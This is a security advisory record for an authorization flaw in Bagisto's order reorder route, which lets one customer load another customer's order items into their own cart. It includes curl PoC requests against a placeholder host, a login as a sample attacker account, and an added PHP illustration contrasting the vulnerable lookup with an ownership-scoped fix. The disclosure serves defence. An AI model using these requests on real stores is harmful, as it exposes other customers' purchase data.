GHSA-x5rw-qvvp-5cgm

Source
https://github.com/advisories/GHSA-x5rw-qvvp-5cgm
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-x5rw-qvvp-5cgm/GHSA-x5rw-qvvp-5cgm.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-x5rw-qvvp-5cgm
Aliases
Published
2026-01-02T22:50:47Z
Modified
2026-02-03T03:14:26.017265Z
Severity
  • 7.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Summary
Bagisto has IDOR in Customer Order Reorder Functionality
Details

Summary

An Insecure Direct Object Reference vulnerability in the customer order reorder function allows any authenticated customer to add items from another customer's order to their own shopping cart by manipulating the order ID parameter. This exposes sensitive purchase information and enables potential fraud.

Details

The vulnerability exists in the reorder method of OrderController.php. Unlike the other order-related functions (view, cancel, printInvoice), which properly validate customer ownership, the reorder function retrieves the order using only the order ID, without verifying that the order belongs to the authenticated customer.

Code location: packages/Webkul/Shop/src/Http/Controllers/Customer/Account/OrderController.php

Exposed Route: packages/Webkul/Shop/src/Routes/customer-routes.php

Route::get('reorder/{id}', 'reorder')->name('shop.customers.account.orders.reorder');
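The missing ownership check, shown as an added illustration in a Laravel-style controller; this is not Bagisto's own code, and the repository methods, the `customer` auth guard and the cart call are assumed names:

```php
<?php
// Added illustration, not Bagisto's code. Assumes a Laravel-style controller
// with an order repository exposing findOrFail()/findOneWhere(), a cart
// service with addProduct(), and an auth guard named 'customer'. All assumed.

class OrderController
{
    // Vulnerable shape described in the advisory: the order is fetched by id
    // alone, so any authenticated customer can reorder any order id.
    public function reorderVulnerable(int $id)
    {
        $order = $this->orderRepository->findOrFail($id);   // no ownership check

        foreach ($order->items as $item) {
            $this->cart->addProduct($item->product_id, ['quantity' => $item->qty_ordered]);
        }

        return redirect()->route('shop.checkout.cart.index');
    }

    // Hardened shape: scope the lookup to the authenticated customer, the same
    // pattern the advisory says view/cancel/printInvoice already follow.
    public function reorder(int $id)
    {
        $order = $this->orderRepository->findOneWhere([
            'id'          => $id,
            'customer_id' => auth()->guard('customer')->id(),
        ]);

        // Return the same 404 for "not found" and "not yours" so the endpoint
        // does not confirm which order ids exist.
        if (! $order) {
            abort(404);
        }

        foreach ($order->items as $item) {
            $this->cart->addProduct($item->product_id, ['quantity' => $item->qty_ordered]);
        }

        return redirect()->route('shop.checkout.cart.index');
    }
}
```

A regression test for the fix should log in as one customer and request the reorder route with another customer's order id, asserting a 404 and an unchanged cart.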

PoC

I. Create a victim account and place an order.
II. Log in as the attacker.
III. Exploit the IDOR by navigating to: http://target.xxx/customer/account/orders/reorder/1
IV. Check http://target.xxx/checkout/cart and verify exploitation.
V. The victim's order items are now in the attacker's cart.

PoC via curl:

curl -c cookies.txt -X POST "http://target.xxx/customer/login" -d "email=attacker@evil.com&password=123qwe"

curl -b cookies.txt "http://target.xxx/customer/account/orders/reorder/1"

curl -b cookies.txt "http://target/api/checkout/cart"

Impact

  • Information Disclosure: Attackers can discover what products other customers have purchased.
  • Potential Fraud: Attackers could potentially exploit this for social engineering or targeted attacks.
Database specific
{
    "nvd_published_at": "2026-01-02T21:15:58Z",
    "github_reviewed_at": "2026-01-02T22:50:47Z",
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-284",
        "CWE-639"
    ],
    "github_reviewed": true
}
References

Affected packages

Packagist / bagisto/bagisto

Package

Name
bagisto/bagisto
Purl
pkg:composer/bagisto/bagisto

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (Unknown introduced version / All previous versions are affected)
Fixed
2.3.10

Affected versions

v0.*
v0.1.0
v0.1.1
v0.1.2
v0.1.3
v0.1.4-BETA1
v0.1.4-BETA2
v0.1.4-BETA3
v0.1.4-BETA4
v0.1.4
v0.1.5
v0.1.6-ALPHA1
v0.1.6
v0.1.7-BETA1
v0.1.7-BETA2
v0.1.7
v0.1.8
v0.1.9-BETA1
v0.1.9
v0.2.0
v0.2.1
v0.2.2
v1.*
v1.0.0-BETA1
v1.0.0
v1.1.0
v1.1.1
v1.1.2
v1.2.0-BETA1
v1.2.0
v1.3.0
v1.3.1
v1.3.2
v1.3.3
v1.4.0
v1.4.1
v1.4.2
v1.4.3
v1.4.4
v1.4.5
v1.5.0
v1.5.1
v2.*
v2.0.0-BETA-1
v2.0.0
v2.1.0
v2.1.1
v2.1.2
v2.2.0
v2.2.1
v2.2.2
v2.2.3
v2.2.4
v2.2.5
v2.2.6
v2.2.7
v2.2.8
v2.2.9
v2.2.10
v2.3.0
v2.3.1
v2.3.2
v2.3.3
v2.3.4
v2.3.5
v2.3.6
v2.3.7
v2.3.8
v2.3.9

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-x5rw-qvvp-5cgm/GHSA-x5rw-qvvp-5cgm.json"